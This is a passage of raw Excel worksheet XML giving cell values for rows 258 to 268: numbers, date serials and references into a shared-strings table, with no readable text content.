      </c>
      <c r="S258">
        <v>1</v>
      </c>
      <c r="T258">
        <v>1</v>
      </c>
      <c r="U258">
        <v>300000</v>
      </c>
      <c r="V258">
        <v>0</v>
      </c>
      <c r="W258">
        <v>6000</v>
      </c>
      <c r="X258">
        <v>11900</v>
      </c>
      <c r="Y258">
        <v>0</v>
      </c>
      <c r="Z258">
        <v>0</v>
      </c>
      <c r="AA258">
        <v>0</v>
      </c>
      <c r="AB258">
        <v>10000</v>
      </c>
      <c r="AC258">
        <v>25000</v>
      </c>
      <c r="AD258">
        <v>1</v>
      </c>
      <c r="AE258">
        <v>50000</v>
      </c>
      <c r="AF258" t="s">
        <v>2194</v>
      </c>
      <c r="AG258">
        <v>75381</v>
      </c>
      <c r="AH258">
        <v>23</v>
      </c>
      <c r="AJ258">
        <v>358</v>
      </c>
      <c r="AK258" t="s">
        <v>2195</v>
      </c>
      <c r="AL258" t="s">
        <v>2196</v>
      </c>
      <c r="AM258" t="s">
        <v>2197</v>
      </c>
      <c r="AN258" t="s">
        <v>82</v>
      </c>
      <c r="AO258">
        <v>2002</v>
      </c>
      <c r="AP258" t="s">
        <v>2198</v>
      </c>
      <c r="AQ258" t="s">
        <v>2199</v>
      </c>
      <c r="AR258" t="s">
        <v>2200</v>
      </c>
      <c r="AS258" t="s">
        <v>71</v>
      </c>
      <c r="AT258" t="s">
        <v>86</v>
      </c>
      <c r="AU258">
        <v>24</v>
      </c>
      <c r="AV258">
        <v>4</v>
      </c>
      <c r="AW258">
        <v>87</v>
      </c>
      <c r="AX258">
        <v>63</v>
      </c>
      <c r="AY258">
        <v>132</v>
      </c>
      <c r="AZ258">
        <v>334</v>
      </c>
      <c r="BA258" t="s">
        <v>16692</v>
      </c>
      <c r="BB258" t="s">
        <v>14580</v>
      </c>
      <c r="BC258" t="s">
        <v>9536</v>
      </c>
      <c r="BD258" t="s">
        <v>12780</v>
      </c>
    </row>
    <row r="259" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A259">
        <v>35</v>
      </c>
      <c r="B259" t="s">
        <v>2201</v>
      </c>
      <c r="C259" t="s">
        <v>88</v>
      </c>
      <c r="D259" t="s">
        <v>2202</v>
      </c>
      <c r="E259" t="s">
        <v>2203</v>
      </c>
      <c r="F259" t="s">
        <v>2204</v>
      </c>
      <c r="G259" s="1">
        <v>44232</v>
      </c>
      <c r="H259">
        <v>8169</v>
      </c>
      <c r="I259">
        <v>8169</v>
      </c>
      <c r="J259">
        <v>1</v>
      </c>
      <c r="K259">
        <v>0</v>
      </c>
      <c r="L259">
        <v>0</v>
      </c>
      <c r="M259">
        <v>0</v>
      </c>
      <c r="N259">
        <v>0</v>
      </c>
      <c r="O259">
        <v>0</v>
      </c>
      <c r="P259">
        <v>6</v>
      </c>
      <c r="Q259">
        <v>3</v>
      </c>
      <c r="R259">
        <v>13</v>
      </c>
      <c r="S259">
        <v>21</v>
      </c>
      <c r="T259">
        <v>1</v>
      </c>
      <c r="U259">
        <v>1500</v>
      </c>
      <c r="V259">
        <v>0</v>
      </c>
      <c r="W259">
        <v>0</v>
      </c>
      <c r="X259">
        <v>0</v>
      </c>
      <c r="Y259">
        <v>0</v>
      </c>
      <c r="Z259">
        <v>0</v>
      </c>
      <c r="AA259">
        <v>6500</v>
      </c>
      <c r="AB259">
        <v>13000</v>
      </c>
      <c r="AC259">
        <v>3000</v>
      </c>
      <c r="AD259">
        <v>1500</v>
      </c>
      <c r="AE259">
        <v>500000</v>
      </c>
      <c r="AF259" t="s">
        <v>2205</v>
      </c>
      <c r="AG259">
        <v>82218</v>
      </c>
      <c r="AH259">
        <v>17</v>
      </c>
      <c r="AJ259">
        <v>274</v>
      </c>
      <c r="AK259" t="s">
        <v>1058</v>
      </c>
      <c r="AL259" t="s">
        <v>1457</v>
      </c>
      <c r="AM259" t="s">
        <v>2206</v>
      </c>
      <c r="AN259" t="s">
        <v>55</v>
      </c>
      <c r="AO259">
        <v>2013</v>
      </c>
      <c r="AP259">
        <v>3654546500</v>
      </c>
      <c r="AQ259" t="s">
        <v>2207</v>
      </c>
      <c r="AR259" t="s">
        <v>2208</v>
      </c>
      <c r="AS259" t="s">
        <v>71</v>
      </c>
      <c r="AT259" t="s">
        <v>58</v>
      </c>
      <c r="AU259">
        <v>20</v>
      </c>
      <c r="AV259">
        <v>1</v>
      </c>
      <c r="AW259">
        <v>98</v>
      </c>
      <c r="AX259">
        <v>51</v>
      </c>
      <c r="AY259">
        <v>10</v>
      </c>
      <c r="AZ259">
        <v>8</v>
      </c>
      <c r="BA259" t="s">
        <v>16590</v>
      </c>
      <c r="BB259" t="s">
        <v>14239</v>
      </c>
      <c r="BC259" t="s">
        <v>12842</v>
      </c>
      <c r="BD259" t="s">
        <v>12096</v>
      </c>
    </row>
    <row r="260" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A260">
        <v>784</v>
      </c>
      <c r="B260" t="s">
        <v>2209</v>
      </c>
      <c r="C260" t="s">
        <v>99</v>
      </c>
      <c r="D260" t="s">
        <v>2210</v>
      </c>
      <c r="E260" t="s">
        <v>142</v>
      </c>
      <c r="F260" t="s">
        <v>2211</v>
      </c>
      <c r="G260" s="1">
        <v>44322</v>
      </c>
      <c r="H260">
        <v>8198</v>
      </c>
      <c r="I260">
        <v>8198</v>
      </c>
      <c r="J260">
        <v>6</v>
      </c>
      <c r="K260">
        <v>0</v>
      </c>
      <c r="L260">
        <v>2</v>
      </c>
      <c r="M260">
        <v>0</v>
      </c>
      <c r="N260">
        <v>0</v>
      </c>
      <c r="O260">
        <v>0</v>
      </c>
      <c r="P260">
        <v>0</v>
      </c>
      <c r="Q260">
        <v>2</v>
      </c>
      <c r="R260">
        <v>2</v>
      </c>
      <c r="S260">
        <v>0</v>
      </c>
      <c r="T260">
        <v>0</v>
      </c>
      <c r="U260">
        <v>2000</v>
      </c>
      <c r="V260">
        <v>0</v>
      </c>
      <c r="W260">
        <v>10</v>
      </c>
      <c r="X260">
        <v>0</v>
      </c>
      <c r="Y260">
        <v>0</v>
      </c>
      <c r="Z260">
        <v>0</v>
      </c>
      <c r="AA260">
        <v>0</v>
      </c>
      <c r="AB260">
        <v>100</v>
      </c>
      <c r="AC260">
        <v>100</v>
      </c>
      <c r="AD260">
        <v>0</v>
      </c>
      <c r="AE260">
        <v>0</v>
      </c>
      <c r="AF260" t="s">
        <v>2212</v>
      </c>
      <c r="AG260">
        <v>14440</v>
      </c>
      <c r="AH260">
        <v>12</v>
      </c>
      <c r="AJ260">
        <v>160</v>
      </c>
      <c r="AK260" t="s">
        <v>114</v>
      </c>
      <c r="AL260" t="s">
        <v>114</v>
      </c>
      <c r="AM260" t="s">
        <v>2213</v>
      </c>
      <c r="AN260" t="s">
        <v>82</v>
      </c>
      <c r="AO260">
        <v>2006</v>
      </c>
      <c r="AP260" t="s">
        <v>2214</v>
      </c>
      <c r="AQ260" t="s">
        <v>2215</v>
      </c>
      <c r="AR260" t="s">
        <v>1878</v>
      </c>
      <c r="AS260" t="s">
        <v>71</v>
      </c>
      <c r="AT260" t="s">
        <v>86</v>
      </c>
      <c r="AU260">
        <v>25</v>
      </c>
      <c r="AV260">
        <v>0</v>
      </c>
      <c r="AW260">
        <v>15</v>
      </c>
      <c r="AX260">
        <v>1</v>
      </c>
      <c r="AY260">
        <v>4</v>
      </c>
      <c r="AZ260">
        <v>0</v>
      </c>
      <c r="BA260" t="s">
        <v>16757</v>
      </c>
      <c r="BB260" t="s">
        <v>14854</v>
      </c>
      <c r="BC260" t="s">
        <v>10029</v>
      </c>
      <c r="BD260" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="261" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A261">
        <v>537</v>
      </c>
      <c r="B261" t="s">
        <v>2216</v>
      </c>
      <c r="C261" t="s">
        <v>47</v>
      </c>
      <c r="D261" t="s">
        <v>2217</v>
      </c>
      <c r="E261" t="s">
        <v>142</v>
      </c>
      <c r="F261" t="s">
        <v>2218</v>
      </c>
      <c r="G261" s="1">
        <v>44252</v>
      </c>
      <c r="H261">
        <v>8200</v>
      </c>
      <c r="I261">
        <v>8200</v>
      </c>
      <c r="J261">
        <v>2</v>
      </c>
      <c r="K261">
        <v>0</v>
      </c>
      <c r="L261">
        <v>2</v>
      </c>
      <c r="M261">
        <v>13</v>
      </c>
      <c r="N261">
        <v>0</v>
      </c>
      <c r="O261">
        <v>0</v>
      </c>
      <c r="P261">
        <v>0</v>
      </c>
      <c r="Q261">
        <v>0</v>
      </c>
      <c r="R261">
        <v>37</v>
      </c>
      <c r="S261">
        <v>0</v>
      </c>
      <c r="T261">
        <v>0</v>
      </c>
      <c r="U261">
        <v>550000</v>
      </c>
      <c r="V261">
        <v>0</v>
      </c>
      <c r="W261">
        <v>12000</v>
      </c>
      <c r="X261">
        <v>13000</v>
      </c>
      <c r="Y261">
        <v>0</v>
      </c>
      <c r="Z261">
        <v>0</v>
      </c>
      <c r="AA261">
        <v>0</v>
      </c>
      <c r="AB261">
        <v>0</v>
      </c>
      <c r="AC261">
        <v>11100</v>
      </c>
      <c r="AD261">
        <v>0</v>
      </c>
      <c r="AE261">
        <v>0</v>
      </c>
      <c r="AF261" t="s">
        <v>2219</v>
      </c>
      <c r="AG261">
        <v>20411</v>
      </c>
      <c r="AH261">
        <v>2</v>
      </c>
      <c r="AJ261">
        <v>53</v>
      </c>
      <c r="AK261" t="s">
        <v>2220</v>
      </c>
      <c r="AL261" t="s">
        <v>2221</v>
      </c>
      <c r="AM261" t="s">
        <v>2222</v>
      </c>
      <c r="AN261" t="s">
        <v>55</v>
      </c>
      <c r="AO261">
        <v>2008</v>
      </c>
      <c r="AP261" t="s">
        <v>2223</v>
      </c>
      <c r="AQ261" t="s">
        <v>2224</v>
      </c>
      <c r="AR261" t="s">
        <v>2225</v>
      </c>
      <c r="AS261" t="s">
        <v>71</v>
      </c>
      <c r="AT261" t="s">
        <v>58</v>
      </c>
      <c r="AU261">
        <v>30</v>
      </c>
      <c r="AV261">
        <v>0</v>
      </c>
      <c r="AW261">
        <v>38</v>
      </c>
      <c r="AX261">
        <v>72</v>
      </c>
      <c r="AY261">
        <v>6</v>
      </c>
      <c r="AZ261">
        <v>19</v>
      </c>
      <c r="BA261" t="s">
        <v>16715</v>
      </c>
      <c r="BB261" t="s">
        <v>14654</v>
      </c>
      <c r="BC261">
        <v>0</v>
      </c>
      <c r="BD261" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="262" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A262">
        <v>365</v>
      </c>
      <c r="B262" t="s">
        <v>2226</v>
      </c>
      <c r="C262" t="s">
        <v>157</v>
      </c>
      <c r="D262" t="s">
        <v>2227</v>
      </c>
      <c r="E262" t="s">
        <v>142</v>
      </c>
      <c r="F262" t="s">
        <v>2228</v>
      </c>
      <c r="G262" s="1">
        <v>44307</v>
      </c>
      <c r="H262">
        <v>8265</v>
      </c>
      <c r="I262">
        <v>8265</v>
      </c>
      <c r="J262">
        <v>2</v>
      </c>
      <c r="K262">
        <v>0</v>
      </c>
      <c r="L262">
        <v>4</v>
      </c>
      <c r="M262">
        <v>0</v>
      </c>
      <c r="N262">
        <v>0</v>
      </c>
      <c r="O262">
        <v>0</v>
      </c>
      <c r="P262">
        <v>0</v>
      </c>
      <c r="Q262">
        <v>2</v>
      </c>
      <c r="R262">
        <v>5</v>
      </c>
      <c r="S262">
        <v>0</v>
      </c>
      <c r="T262">
        <v>1</v>
      </c>
      <c r="U262">
        <v>500000</v>
      </c>
      <c r="V262">
        <v>0</v>
      </c>
      <c r="W262">
        <v>15000</v>
      </c>
      <c r="X262">
        <v>0</v>
      </c>
      <c r="Y262">
        <v>0</v>
      </c>
      <c r="Z262">
        <v>0</v>
      </c>
      <c r="AA262">
        <v>0</v>
      </c>
      <c r="AB262">
        <v>3000</v>
      </c>
      <c r="AC262">
        <v>5000</v>
      </c>
      <c r="AD262">
        <v>0</v>
      </c>
      <c r="AE262">
        <v>3000</v>
      </c>
      <c r="AF262" t="s">
        <v>2229</v>
      </c>
      <c r="AG262">
        <v>0</v>
      </c>
      <c r="AH262">
        <v>16</v>
      </c>
      <c r="AJ262">
        <v>264</v>
      </c>
      <c r="AK262" t="s">
        <v>1608</v>
      </c>
      <c r="AL262" t="s">
        <v>2230</v>
      </c>
      <c r="AM262" t="s">
        <v>2231</v>
      </c>
      <c r="AN262" t="s">
        <v>55</v>
      </c>
      <c r="AO262">
        <v>2011</v>
      </c>
      <c r="AP262">
        <v>318437095</v>
      </c>
      <c r="AQ262" t="s">
        <v>2232</v>
      </c>
      <c r="AR262" t="s">
        <v>2233</v>
      </c>
      <c r="AS262" t="s">
        <v>71</v>
      </c>
      <c r="AT262" t="s">
        <v>58</v>
      </c>
      <c r="AU262">
        <v>25</v>
      </c>
      <c r="AV262">
        <v>0</v>
      </c>
      <c r="AW262">
        <v>27</v>
      </c>
      <c r="AX262">
        <v>67</v>
      </c>
      <c r="AY262">
        <v>21</v>
      </c>
      <c r="AZ262">
        <v>6</v>
      </c>
      <c r="BA262" t="s">
        <v>16673</v>
      </c>
      <c r="BB262">
        <v>0</v>
      </c>
      <c r="BC262">
        <v>0</v>
      </c>
      <c r="BD262" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="263" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A263">
        <v>253</v>
      </c>
      <c r="B263" t="s">
        <v>2234</v>
      </c>
      <c r="C263" t="s">
        <v>99</v>
      </c>
      <c r="D263" t="s">
        <v>2235</v>
      </c>
      <c r="E263" t="s">
        <v>142</v>
      </c>
      <c r="F263" t="s">
        <v>2236</v>
      </c>
      <c r="G263" s="1">
        <v>44264</v>
      </c>
      <c r="H263">
        <v>8294</v>
      </c>
      <c r="I263">
        <v>8294</v>
      </c>
      <c r="J263">
        <v>3</v>
      </c>
      <c r="K263">
        <v>0</v>
      </c>
      <c r="L263">
        <v>2</v>
      </c>
      <c r="M263">
        <v>0</v>
      </c>
      <c r="N263">
        <v>0</v>
      </c>
      <c r="O263">
        <v>0</v>
      </c>
      <c r="P263">
        <v>0</v>
      </c>
      <c r="Q263">
        <v>0</v>
      </c>
      <c r="R263">
        <v>0</v>
      </c>
      <c r="S263">
        <v>0</v>
      </c>
      <c r="T263">
        <v>0</v>
      </c>
      <c r="U263">
        <v>3800000</v>
      </c>
      <c r="V263">
        <v>0</v>
      </c>
      <c r="W263">
        <v>11000</v>
      </c>
      <c r="X263">
        <v>0</v>
      </c>
      <c r="Y263">
        <v>0</v>
      </c>
      <c r="Z263">
        <v>0</v>
      </c>
      <c r="AA263">
        <v>0</v>
      </c>
      <c r="AB263">
        <v>0</v>
      </c>
      <c r="AC263">
        <v>0</v>
      </c>
      <c r="AD263">
        <v>0</v>
      </c>
      <c r="AE263">
        <v>0</v>
      </c>
      <c r="AF263" t="s">
        <v>2237</v>
      </c>
      <c r="AG263">
        <v>14440</v>
      </c>
      <c r="AH263">
        <v>12</v>
      </c>
      <c r="AJ263">
        <v>160</v>
      </c>
      <c r="AK263" t="s">
        <v>114</v>
      </c>
      <c r="AL263" t="s">
        <v>2238</v>
      </c>
      <c r="AM263" t="s">
        <v>2239</v>
      </c>
      <c r="AN263" t="s">
        <v>55</v>
      </c>
      <c r="AO263">
        <v>2013</v>
      </c>
      <c r="AP263">
        <v>2166691166</v>
      </c>
      <c r="AQ263" t="s">
        <v>2240</v>
      </c>
      <c r="AR263" t="s">
        <v>2241</v>
      </c>
      <c r="AS263" t="s">
        <v>71</v>
      </c>
      <c r="AT263" t="s">
        <v>58</v>
      </c>
      <c r="AU263">
        <v>24</v>
      </c>
      <c r="AV263">
        <v>1</v>
      </c>
      <c r="AW263">
        <v>111</v>
      </c>
      <c r="AX263">
        <v>171</v>
      </c>
      <c r="AY263">
        <v>34</v>
      </c>
      <c r="AZ263">
        <v>51</v>
      </c>
      <c r="BA263" t="s">
        <v>16650</v>
      </c>
      <c r="BB263" t="s">
        <v>14228</v>
      </c>
      <c r="BC263" t="s">
        <v>9536</v>
      </c>
      <c r="BD263" t="s">
        <v>11181</v>
      </c>
    </row>
    <row r="264" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A264">
        <v>82</v>
      </c>
      <c r="B264" t="s">
        <v>2242</v>
      </c>
      <c r="C264" t="s">
        <v>88</v>
      </c>
      <c r="D264" t="s">
        <v>2243</v>
      </c>
      <c r="E264" t="s">
        <v>142</v>
      </c>
      <c r="F264" t="s">
        <v>2244</v>
      </c>
      <c r="G264" s="1">
        <v>44287</v>
      </c>
      <c r="H264">
        <v>8530</v>
      </c>
      <c r="I264">
        <v>8530</v>
      </c>
      <c r="J264">
        <v>2</v>
      </c>
      <c r="K264">
        <v>3</v>
      </c>
      <c r="L264">
        <v>1</v>
      </c>
      <c r="M264">
        <v>0</v>
      </c>
      <c r="N264">
        <v>0</v>
      </c>
      <c r="O264">
        <v>2</v>
      </c>
      <c r="P264">
        <v>0</v>
      </c>
      <c r="Q264">
        <v>0</v>
      </c>
      <c r="R264">
        <v>3</v>
      </c>
      <c r="S264">
        <v>0</v>
      </c>
      <c r="T264">
        <v>1</v>
      </c>
      <c r="U264">
        <v>250000</v>
      </c>
      <c r="V264">
        <v>2000</v>
      </c>
      <c r="W264">
        <v>7000</v>
      </c>
      <c r="X264">
        <v>0</v>
      </c>
      <c r="Y264">
        <v>0</v>
      </c>
      <c r="Z264">
        <v>300</v>
      </c>
      <c r="AA264">
        <v>0</v>
      </c>
      <c r="AB264">
        <v>0</v>
      </c>
      <c r="AC264">
        <v>7000</v>
      </c>
      <c r="AD264">
        <v>0</v>
      </c>
      <c r="AE264">
        <v>50000</v>
      </c>
      <c r="AF264" t="s">
        <v>2245</v>
      </c>
      <c r="AG264">
        <v>80222</v>
      </c>
      <c r="AH264">
        <v>17</v>
      </c>
      <c r="AJ264">
        <v>282</v>
      </c>
      <c r="AK264" t="s">
        <v>2246</v>
      </c>
      <c r="AL264" t="s">
        <v>593</v>
      </c>
      <c r="AM264" t="s">
        <v>2247</v>
      </c>
      <c r="AN264" t="s">
        <v>82</v>
      </c>
      <c r="AO264">
        <v>1999</v>
      </c>
      <c r="AP264" t="s">
        <v>2248</v>
      </c>
      <c r="AQ264" t="s">
        <v>2249</v>
      </c>
      <c r="AR264" t="s">
        <v>2245</v>
      </c>
      <c r="AS264" t="s">
        <v>71</v>
      </c>
      <c r="AT264" t="s">
        <v>86</v>
      </c>
      <c r="AU264">
        <v>25</v>
      </c>
      <c r="AV264">
        <v>1</v>
      </c>
      <c r="AW264">
        <v>37</v>
      </c>
      <c r="AX264">
        <v>4</v>
      </c>
      <c r="AY264">
        <v>66</v>
      </c>
      <c r="AZ264">
        <v>38</v>
      </c>
      <c r="BA264" t="s">
        <v>16602</v>
      </c>
      <c r="BB264" t="s">
        <v>14280</v>
      </c>
      <c r="BC264">
        <v>0</v>
      </c>
      <c r="BD264" t="s">
        <v>13245</v>
      </c>
    </row>
    <row r="265" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A265">
        <v>540</v>
      </c>
      <c r="B265" t="s">
        <v>2250</v>
      </c>
      <c r="C265" t="s">
        <v>318</v>
      </c>
      <c r="D265" t="s">
        <v>2251</v>
      </c>
      <c r="E265" t="s">
        <v>2252</v>
      </c>
      <c r="F265" t="s">
        <v>2253</v>
      </c>
      <c r="G265" s="1">
        <v>44299</v>
      </c>
      <c r="H265">
        <v>8643</v>
      </c>
      <c r="I265">
        <v>8643</v>
      </c>
      <c r="J265">
        <v>0</v>
      </c>
      <c r="K265">
        <v>1</v>
      </c>
      <c r="L265">
        <v>1</v>
      </c>
      <c r="M265">
        <v>0</v>
      </c>
      <c r="N265">
        <v>0</v>
      </c>
      <c r="O265">
        <v>0</v>
      </c>
      <c r="P265">
        <v>0</v>
      </c>
      <c r="Q265">
        <v>1</v>
      </c>
      <c r="R265">
        <v>5</v>
      </c>
      <c r="S265">
        <v>1</v>
      </c>
      <c r="T265">
        <v>1</v>
      </c>
      <c r="U265">
        <v>0</v>
      </c>
      <c r="V265">
        <v>100000</v>
      </c>
      <c r="W265">
        <v>3000</v>
      </c>
      <c r="X265">
        <v>0</v>
      </c>
      <c r="Y265">
        <v>0</v>
      </c>
      <c r="Z265">
        <v>0</v>
      </c>
      <c r="AA265">
        <v>0</v>
      </c>
      <c r="AB265">
        <v>0</v>
      </c>
      <c r="AC265">
        <v>300</v>
      </c>
      <c r="AD265">
        <v>1</v>
      </c>
      <c r="AE265">
        <v>0</v>
      </c>
      <c r="AF265" t="s">
        <v>2254</v>
      </c>
      <c r="AG265">
        <v>92255</v>
      </c>
      <c r="AH265">
        <v>26</v>
      </c>
      <c r="AJ265">
        <v>403</v>
      </c>
      <c r="AK265" t="s">
        <v>2255</v>
      </c>
      <c r="AL265" t="s">
        <v>2256</v>
      </c>
      <c r="AM265" t="s">
        <v>2257</v>
      </c>
      <c r="AN265" t="s">
        <v>55</v>
      </c>
      <c r="AO265">
        <v>2013</v>
      </c>
      <c r="AP265">
        <v>82299994677</v>
      </c>
      <c r="AQ265" t="s">
        <v>2258</v>
      </c>
      <c r="AR265" t="s">
        <v>2259</v>
      </c>
      <c r="AS265" t="s">
        <v>71</v>
      </c>
      <c r="AT265" t="s">
        <v>58</v>
      </c>
      <c r="AU265">
        <v>1</v>
      </c>
      <c r="AV265">
        <v>1</v>
      </c>
      <c r="AW265">
        <v>1</v>
      </c>
      <c r="AX265">
        <v>38</v>
      </c>
      <c r="AY265">
        <v>3</v>
      </c>
      <c r="AZ265">
        <v>2</v>
      </c>
      <c r="BA265" t="s">
        <v>17593</v>
      </c>
      <c r="BB265" t="s">
        <v>14657</v>
      </c>
      <c r="BC265">
        <v>0</v>
      </c>
      <c r="BD265" t="s">
        <v>13124</v>
      </c>
    </row>
    <row r="266" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A266">
        <v>124</v>
      </c>
      <c r="B266" t="s">
        <v>2260</v>
      </c>
      <c r="C266" t="s">
        <v>99</v>
      </c>
      <c r="D266" t="s">
        <v>2261</v>
      </c>
      <c r="E266" t="s">
        <v>142</v>
      </c>
      <c r="F266" t="s">
        <v>2244</v>
      </c>
      <c r="G266" s="1">
        <v>44274</v>
      </c>
      <c r="H266">
        <v>8675</v>
      </c>
      <c r="I266">
        <v>8675</v>
      </c>
      <c r="J266">
        <v>2</v>
      </c>
      <c r="K266">
        <v>2</v>
      </c>
      <c r="L266">
        <v>2</v>
      </c>
      <c r="M266">
        <v>0</v>
      </c>
      <c r="N266">
        <v>0</v>
      </c>
      <c r="O266">
        <v>0</v>
      </c>
      <c r="P266">
        <v>0</v>
      </c>
      <c r="Q266">
        <v>0</v>
      </c>
      <c r="R266">
        <v>0</v>
      </c>
      <c r="S266">
        <v>1</v>
      </c>
      <c r="T266">
        <v>2</v>
      </c>
      <c r="U266">
        <v>14000</v>
      </c>
      <c r="V266">
        <v>10000</v>
      </c>
      <c r="W266">
        <v>10000</v>
      </c>
      <c r="X266">
        <v>0</v>
      </c>
      <c r="Y266">
        <v>0</v>
      </c>
      <c r="Z266">
        <v>0</v>
      </c>
      <c r="AA266">
        <v>0</v>
      </c>
      <c r="AB266">
        <v>0</v>
      </c>
      <c r="AC266">
        <v>0</v>
      </c>
      <c r="AD266">
        <v>1</v>
      </c>
      <c r="AE266">
        <v>500</v>
      </c>
      <c r="AF266" t="s">
        <v>152</v>
      </c>
      <c r="AG266">
        <v>14440</v>
      </c>
      <c r="AH266">
        <v>12</v>
      </c>
      <c r="AJ266">
        <v>160</v>
      </c>
      <c r="AK266" t="s">
        <v>114</v>
      </c>
      <c r="AL266" t="s">
        <v>396</v>
      </c>
      <c r="AM266" t="s">
        <v>2262</v>
      </c>
      <c r="AN266" t="s">
        <v>55</v>
      </c>
      <c r="AO266">
        <v>2015</v>
      </c>
      <c r="AP266">
        <v>2129625972</v>
      </c>
      <c r="AQ266" t="s">
        <v>2263</v>
      </c>
      <c r="AR266" t="s">
        <v>2142</v>
      </c>
      <c r="AS266" t="s">
        <v>71</v>
      </c>
      <c r="AT266" t="s">
        <v>58</v>
      </c>
      <c r="AU266">
        <v>0</v>
      </c>
      <c r="AV266">
        <v>0</v>
      </c>
      <c r="AW266">
        <v>0</v>
      </c>
      <c r="AX266">
        <v>0</v>
      </c>
      <c r="AY266">
        <v>38</v>
      </c>
      <c r="AZ266">
        <v>22</v>
      </c>
      <c r="BA266" t="s">
        <v>16615</v>
      </c>
      <c r="BB266" t="s">
        <v>14319</v>
      </c>
      <c r="BC266">
        <v>0</v>
      </c>
      <c r="BD266" t="s">
        <v>12994</v>
      </c>
    </row>
    <row r="267" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A267">
        <v>438</v>
      </c>
      <c r="B267" t="s">
        <v>2264</v>
      </c>
      <c r="C267" t="s">
        <v>224</v>
      </c>
      <c r="D267" t="s">
        <v>2265</v>
      </c>
      <c r="E267" t="s">
        <v>76</v>
      </c>
      <c r="F267" t="s">
        <v>2266</v>
      </c>
      <c r="G267" s="1">
        <v>44252</v>
      </c>
      <c r="H267">
        <v>8733</v>
      </c>
      <c r="I267">
        <v>8733</v>
      </c>
      <c r="J267">
        <v>0</v>
      </c>
      <c r="K267">
        <v>0</v>
      </c>
      <c r="L267">
        <v>0</v>
      </c>
      <c r="M267">
        <v>0</v>
      </c>
      <c r="N267">
        <v>0</v>
      </c>
      <c r="O267">
        <v>0</v>
      </c>
      <c r="P267">
        <v>0</v>
      </c>
      <c r="Q267">
        <v>1</v>
      </c>
      <c r="R267">
        <v>0</v>
      </c>
      <c r="S267">
        <v>0</v>
      </c>
      <c r="T267">
        <v>0</v>
      </c>
      <c r="U267">
        <v>0</v>
      </c>
      <c r="V267">
        <v>0</v>
      </c>
      <c r="W267">
        <v>0</v>
      </c>
      <c r="X267">
        <v>0</v>
      </c>
      <c r="Y267">
        <v>0</v>
      </c>
      <c r="Z267">
        <v>0</v>
      </c>
      <c r="AA267">
        <v>0</v>
      </c>
      <c r="AB267">
        <v>200</v>
      </c>
      <c r="AC267">
        <v>0</v>
      </c>
      <c r="AD267">
        <v>0</v>
      </c>
      <c r="AE267">
        <v>0</v>
      </c>
      <c r="AF267" t="s">
        <v>2267</v>
      </c>
      <c r="AG267">
        <v>0</v>
      </c>
      <c r="AH267">
        <v>15</v>
      </c>
      <c r="AJ267">
        <v>227</v>
      </c>
      <c r="AK267" t="s">
        <v>2268</v>
      </c>
      <c r="AL267" t="s">
        <v>2269</v>
      </c>
      <c r="AM267" t="s">
        <v>2270</v>
      </c>
      <c r="AN267" t="s">
        <v>68</v>
      </c>
      <c r="AO267">
        <v>2009</v>
      </c>
      <c r="AP267">
        <v>818273814</v>
      </c>
      <c r="AQ267" t="s">
        <v>2271</v>
      </c>
      <c r="AR267" t="s">
        <v>2267</v>
      </c>
      <c r="AS267" t="s">
        <v>71</v>
      </c>
      <c r="AT267" t="s">
        <v>72</v>
      </c>
      <c r="AU267">
        <v>6</v>
      </c>
      <c r="AV267">
        <v>1</v>
      </c>
      <c r="AW267">
        <v>1</v>
      </c>
      <c r="AX267">
        <v>6</v>
      </c>
      <c r="AY267">
        <v>0</v>
      </c>
      <c r="AZ267">
        <v>0</v>
      </c>
      <c r="BA267" t="s">
        <v>17656</v>
      </c>
      <c r="BB267" t="s">
        <v>14573</v>
      </c>
      <c r="BC267" t="s">
        <v>13010</v>
      </c>
      <c r="BD267">
        <v>0</v>
      </c>
    </row>
    <row r="268" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A268">
        <v>495</v>
      </c>
      <c r="B268" t="s">
        <v>2272</v>
      </c>
      <c r="C268" t="s">
        <v>318</v>
      </c>
      <c r="D268" t="s">
        <v>2273</v>
      </c>
      <c r="E268" t="s">
        <v>101</v>
      </c>
      <c r="F268" t="s">
        <v>2274</v>
      </c>
      <c r="G268" s="1">
        <v>44267</v>
      </c>
      <c r="H268">
        <v>8821</v>
      </c>
      <c r="I268">
        <v>8821</v>
      </c>
      <c r="J268">
        <v>3</v>
      </c>
      <c r="K268">
        <v>3</v>
      </c>
      <c r="L268">
        <v>4</v>
      </c>
      <c r="M268">
        <v>1</v>
      </c>
      <c r="N268">
        <v>0</v>
      </c>
      <c r="O268">
        <v>0</v>
      </c>
      <c r="P268">
        <v>0</v>
      </c>
      <c r="Q268">
        <v>2</v>
      </c>
      <c r="R268">
        <v>4</v>
      </c>
      <c r="S268">
        <v>0</v>
      </c>
      <c r="T268">
        <v>1</v>
      </c>
      <c r="U268">
        <v>1500000</v>
      </c>
      <c r="V268">
        <v>1200000</v>
      </c>
      <c r="W268">
        <v>800000</v>
      </c>
      <c r="X268">
        <v>1000</v>
      </c>
      <c r="Y268">
        <v>0</v>
      </c>
      <c r="Z268">
        <v>0</v>
      </c>
      <c r="AA268">
        <v>0</v>
      </c>
      <c r="AB268">
        <v>2000</v>
      </c>
      <c r="AC268">
        <v>4000</v>
      </c>
      <c r="AD268">
        <v>0</v>
      </c>
      <c r="AE268">
        <v>10000</v>
      </c>
      <c r="AF268" t="s">
        <v>2275</v>
      </c>
      <c r="AG268">
        <v>90243</v>
      </c>
      <c r="AH268">
        <v>26</v>
      </c>
      <c r="AJ268">
        <v>420</v>
      </c>
      <c r="AK268" t="s">
        <v>2276</v>
      </c>
      <c r="AL268" t="s">
        <v>332</v>
      </c>
      <c r="AM268" t="s">
        <v>2277</v>
      </c>
      <c r="AN268" t="s">
        <v>55</v>
      </c>
      <c r="AO268">
        <v>2008</v>
      </c>
      <c r="AP268" t="s">
        <v>2278</v>
      </c>
      <c r="AQ268" t="s">
        <v>2279</v>
      </c>
      <c r="AR268" t="s">
        <v>2275</v>
      </c>
      <c r="AS268" t="s">
        <v>71</v>
      </c>
